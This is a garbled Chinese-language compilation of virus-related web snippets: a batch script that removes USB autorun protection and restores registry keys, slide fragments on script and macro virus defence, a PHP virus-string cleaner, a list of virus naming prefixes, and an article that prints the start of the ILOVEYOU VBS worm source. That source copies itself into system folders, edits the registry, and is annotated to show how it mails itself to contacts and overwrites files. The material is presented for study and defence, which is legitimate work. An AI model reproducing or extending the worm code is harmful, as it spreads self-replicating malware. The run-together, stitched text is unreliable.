%choice%="1" Goto clearauto5If %choice%="0" Goto clearauto:clearauto6clsEcho.Set /p pf= 请输入盘符,如"F:"(不包括引号)Echo 即将取消免疫%pf%盘……|find /i ":"||Set pf=%pf%:&&Echo 即将取消免疫%pf%盘……fsutil fsinfo drivetype %pf% |find /i "固定驱动器" && (cacls "%pf%\autorun.inf" /T /C /P everyone:F&Del /a /f /q "%pf%\autorun.inf" & rd /s /q "%pf%\autorun.inf">nul 2>nul Goto DoneUnauto)>nul 2>nulfsutil fsinfo drivetype %pf% |find /i "可移动驱动器" && (cacls "%pf%\autorun.inf" /T /C /P everyone:F&Del /a /f /q "%pf%\autorun.inf" & rd /s /q "%pf%\autorun.inf">nul 2>nul Goto DoneUnauto)>nul 2>nulEcho.Echo 您所输入的盘符不存在或者是只读设备,Echo 请重新输入Goto clearauto6:DoneUnautoclsEcho.Echo 指定的磁盘 %pf% 已经成功解除了 Autorun 病毒免疫Echo.Echo [1] 继续解除免疫其他磁盘Echo [0] 返回主菜单Set choice=Set /p choice= 请输入您的选择(1/0):If %choice%="" Goto DoneUnautoIf %choice%="1" Goto clearauto6If %choice%="0" Goto clearauto:clearauto7clsRem 防止在资源管理器中彻底隐藏文件、禁止文件等reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore r\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_DWORD /d 0x00000001 /f>nul 2>nulreg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ MountPoints2" /f>nul 2>nulreg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ex plorer\DisallowRun" /f>nul 2>nulreg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ex plorer" /v DisallowRun /f>nul 2>nulRem 防止转移启动组位置reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\S hell Folders" /v Startup /d "%USERPROFILE%\「开始」菜单\程序\启动" /f>nul 2>nulreg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\S hell Folders" /v "Common Startup" /d "%ALLUSERSPROFILE%\「开始」菜单\程序\启动" /f>nul 2>nulEcho.Echo 相关注册表恢复完毕,任意键返回……pause>nulGoto clearauto相关阅读:2018网络安全事件:一、英特尔处理器曝“Meltdown”和“Spectre漏洞”2018年1月,英特尔处理器中曝“Meltdown”(熔断)和“Spectre” (幽灵)两大新型漏洞,包括AMD、ARM、英特尔系统和处理器在内,几乎近20年发售的所有设备都受到影响,受影响的设备包括手机、电脑、服务器以及云计算产品。
“爱虫(I_Loveyou)”病毒代码解析和杀毒方法
“爱虫(I Loveyou)”病毒代码解析和杀毒方法中国代码联盟黄冬李文武近来在网上出现了“我爱你”病毒,让人们恐慌一时,而它在国内却没有出现什么问题,到现在我也没有听到有哪位计算机使用者说自己被爱到至死。
究其原因是什么?而“我爱你”病毒到底是什么?难道说是我国的计算机防毒水平和计算机杀毒软件的水平已经到了世界领先的水平?我们来细细看看它的原因就明白其中的道理了。
另:笔者写本文完全是为了学术作用,请不要将此病毒代码用于破坏之目的。
首先让我们来看一看我爱你病毒的来源。
有一天你会收到一封邮件,它的主题是“I Love You”(如果细细读读它的程序,这个主题其实可以并不是I LoveYou),在它的信中带有了一个叫“iloveyou.vbs ”的附件,而这个附件将是病毒的根源。
下面这段是“我爱你”病毒的所有的源代码,其中加入了我的注释(大多数的vbs的语法大家可以到wsh中去查、我在函数调用的地方写明了这些函数的说明,具体实现可以到函数体中去找):Rem=========================================================== ============Rem 本文件为病毒样本,供学习之用,原文件中扫描文件进行感染部分被我注释掉了Rem 请勿将本文件用作破坏之目的。
white (***************) hd(hd@email.)Rem=========================================================== ============On Error Resume Nextdim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,doweq=""ctr=0Set fso = CreateObject("Scripting.FileSystemObject")set file = fso.OpenTextFile(WScript.ScriptFullname,1)vbscopy=file.ReadAllmain()sub main()On Error Resume Nextdim wscr,rrset wscr=CreateObject("WScript.Shell")rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptingHost\Settings\Timeout")if (rr>=1) thenwscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptingHost\Settings\Timeout",0,"REG_DWORD"end ifSet dirwin = fso.GetSpecialFolder(0)Set dirsystem = fso.GetSpecialFolder(1)Set dirtemp = fso.GetSpecialFolder(2)Set c = fso.GetFile(WScript.ScriptFullName)c.Copy(dirsystem&"\MSKernel32.vbs")c.Copy(dirwin&"\Win32DLL.vbs")c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") '上面三句将自身复制成三个文件regruns() '如果系统为win98,设IE的起始页为四个URL之一,以下载一个叫WIN-BUGSFIX.exe 的文件,'并将其设为系统启动时自动执行的程序,看起来好象是一个补丁程序html() '为OUTLOOK用户生成一个含病毒代码的HTML文件LOVE-LETTER-FOR-YOU.HTM,'该HTML文件里包含一段JAVASCRIPT,打开时脚本被执行,病毒体被写入文件MSKernel32.vbs, 同时被设成'系统启动时自动执行spreadtoemail() '为OUTLOOK里的所有联系人发一封包含上面那个文件的邮件listadriv() '扫描整个磁盘,将后缀为.vbs, ..vbe的文件换成自身,将后缀为.js, .jse, .css, .wsh, .sct, .hta, '的文件改后缀为vbs并写入自身,同时删除原有文件,将后缀为.jpg,.jpeg的在文件名后加.vbs后,写入'自身,将后缀为.mp3,mp2的文件名后加.vbs并写入自身,同时将文件属性改为隐藏文件,'如果发现有mIRC,将改写script.ini,使得mIRC向所有频道里的人发送刚才的html文件。
4-计算机病毒及恶意代码
2016/1/3
20
5.2.3 传统计算机病毒防御
宏病毒的预防与清除
找到一个无毒的Normal.dot 文件的备份,将位于 “MSOffice \Template ”文件夹下的通用模板 Normal.dot文件替换掉; 对于已染病毒的文件,先打开一个无毒Word文件, 按照以下菜单打开对话框:工具->宏->安全性, 设臵安全性为高
2016/1/3
23
5.3 脚本病毒
5.3.2 脚本病毒原理 脚本病毒的传播分析
脚本病毒一般是直接通过自我复制来感染文件的,病毒中的 绝大部分代码都可以直接附加在其它同类程序中间: 通过电子邮件传播 通过局域网共享传播 感染HTML、ASP、JSP、PHP等网页通过浏览器传播 通过U盘自动运行传播 其它的传播方式
2016/1/3
26
5.3.3 脚本病毒防御
因此可以采用以下方法防御脚本病毒
可以通过打开“我的计算机”,依次点击[查看]→[文件夹选 项]→[文件类型]在文件类型中将后缀名为“VBS、VBE、JS、JSE、 WSH、WSF”的所有针对脚本文件的操作均删除。这样这些文件就 不会被执行了。 在IE设臵中将ActiveX插件和控件以及Java相关的组件全部禁止, 可以避免一些恶意代码的攻击。方法是:打开IE,点击“工 具”→“Internet选项”→“安全”→“自定义级别”,在“安全 设臵”对话框中,将其中所有的ActiveX插件和控件以及与Java相 关的组件全部禁止即可。 禁用文件系统对象FileSystemObject, 用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。 禁止邮件软件的自动收发邮件功能 Windows默认的是“隐藏已知文件类型的扩展名称”,将其修改为 显示所有文件类型的扩展名称。 选择一款好的防病毒软件并做好及时升级。
网页脚本病毒的查杀
一、对IE浏览器产生破坏的网页病毒:(一).默认主页被修改1.破坏特性:默认主页被自动改为某网站的网址。
2.表现形式:浏览器的默认主页被自动设为如WWW.********.COM的网址。
3.清除方法:采用手动修改注册表法,开始菜单->运行->regedit->确定,打开注册表编辑工具,按顺序依次打开:HKEY_LOCAL_USER\Software\Microsoft\Internet Explorer\Main 分支,找到Default_Page_URL键值名(用来设置默认主页),在右窗口点击右键进行修改即可。
按F5键刷新生效。
危害程度:一般(二).默认首页被修改1.破坏特性:默认首页被自动改为某网站的网址.2.表现形式:浏览器的默认主页被自动设为如WWW.********.COM的网址。
3.清除方法:采用手动修改注册表法,开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_LOCAL_USER\Software\Microsoft\Internet Explorer\Main分支,找到StartPage键值名(用来设置默认首页),在右窗口点击右键进行修改即可。
按F5键刷新生效。
危害程度:一般(三).默认的微软主页被修改1.破坏特性:默认微软主页被自动改为某网站的网址.2.表现形式:默认微软主页被篡改3.清除方法:(1)手动修改注册表法:开始菜单->运行->regedit->确定,打开注册表编辑工具,按如下顺序依次打开:HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main分支,找到Default_Page_URL键值名(用来设置默认微软主页),在右窗口点击右键,将键值修改为/windows/ie_intl/cn/start/即可。
按F5键刷新生效。
php网页病毒清除的方法
php网页病毒清除的方法很多人的网页经常被无故的在php,asp,html,js 等文件后台加上一些木马地址,造成了很大的困扰,你知道要怎么清除php网页病毒吗?下面是店铺整理的一些关于php网页病毒清除的方法的相关资料,供你参考。
php网页病毒清除的方法:首先们要读取 $checkFile 文件这个文章是判断一个文章是否被感染了,如果是就会执行$savafile变量里面的txt文件路径的所有文件,进行按你infecFile病毒列表清除一次.复制代码代码如下:Class clear_virus{//public $content;public $infectFile ='virus.txt';//病毒文件列表文件public $savefile ="save.txt";//所在查看病毒的文件列表public $timep ='time.txt';//些记录清除病毒时间public $checkFile ='e.php';//这里是设置public $run =0;public $virus_type;public $replace ;public $filepath ;public $tag =0;function open_file(){$this->read_virus();$this->check_File();if($this->run){$this->update_time();$this->read_file() ;foreach($this->filepath as $tmppath){if(file_exists($tmppath)){$tmp_file =file_get_contents($tmppath);print_r( $this->virus_type);for( $i=0;$ivirus_type);$i++ ){if( strrpos($tmp_file,$this->virus_type[$i])!== false){ $tmp_file =str_replace($this->virus_type[$i],'',$tmp_file); $this->tag =1;}}if( $this->tag ){$handle =fopen($tmppath,'w');fwrite($handle,$tmp_file);fclose($handle);unset($tmp_file);}}else{;}}}}function check_File(){if(file_exists($this->checkFile) ){$temp =file_get_contents($this->checkFile) ;echo $temp;foreach( $this->virus_type as $v_tmp ){if( strrpos($temp,$v_tmp)!== false ){$this->run =1;break;}}echo $this->run;unset($temp);}else{$this->show_error(5);}}function update_time(){if(file_exists($this->timep) ){$tmp_time =date("Y-m-d H:i:s").chr(13).'|'; $tmp_fp =fopen($this->timep,'a+'); fwrite($tmp_fp,$tmp_time);fclose($tmp_fp);}}function read_File(){if(file_exists($this->savefile) ){$this->content =file($this->savefile);if(is_array($this->content)){$this->filepath =$this->content;}else{$this->show_error(3);}}else{$this->show_error(4);}}function read_virus(){if(file_exists($this->infectFile) ){$this->replace =file($this->infectFile);if(is_array($this->replace)){$this->virus_type=$this->replace;}else{$this->show_error(1);}}else{$this->show_error(2);}}function show_error($number){$array = array('1'=>'病毒文件未不能读取!','2'=>'病毒文件列表不存在!','3'=>'文件列表不存了','4'=>'查杀的文件不存','5'=>$this->$checkFile.'不存在了,请设置病毒感染文件' );echo $array[$number];}}$virus =new clear_virus;$virus->open_file();。
电脑病毒代号有哪些
电脑病毒代号有哪些每个人都有绰号,电脑病毒也有代号,下面由店铺给你做出详细的电脑病毒代号介绍!希望对你有帮助!电脑病毒代号介绍:1、系统病毒系统病毒的前缀为:Win32、PE、Win95、W32、W95等。
这些病毒的一般公有的特性是可以感染windows操作系统的*.exe 和*.dll 文件,并通过这些文件进行传播。
如CIH病毒。
2、蠕虫病毒蠕虫病毒的前缀是:Worm。
这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。
比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。
3、木马病毒、黑客病毒木马病毒其前缀是:Trojan,黑客病毒前缀名一般为 Hack 。
木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。
木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而黑客病毒则会通过该木马病毒来进行控制。
现在这两种类型都越来越趋向于整合了。
一般的木马如QQ消息尾巴木马 Trojan.QQ3344 ,还有大家可能遇见比较多的针对网络游戏的木马病毒如Trojan.LMir.PSW.60 。
这里补充一点,病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为“密码”的英文“password”的缩写)一些黑客程序如:网络枭雄(her.Client)等。
4、脚本病毒脚本病毒的前缀是:Script。
脚本病毒的公有特性是使用脚本语言编写,通过网页进行的传播的病毒,如红色代码(Script.Redlof)——可不是我们的老大代码兄哦^_^。
脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。
5、宏病毒其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。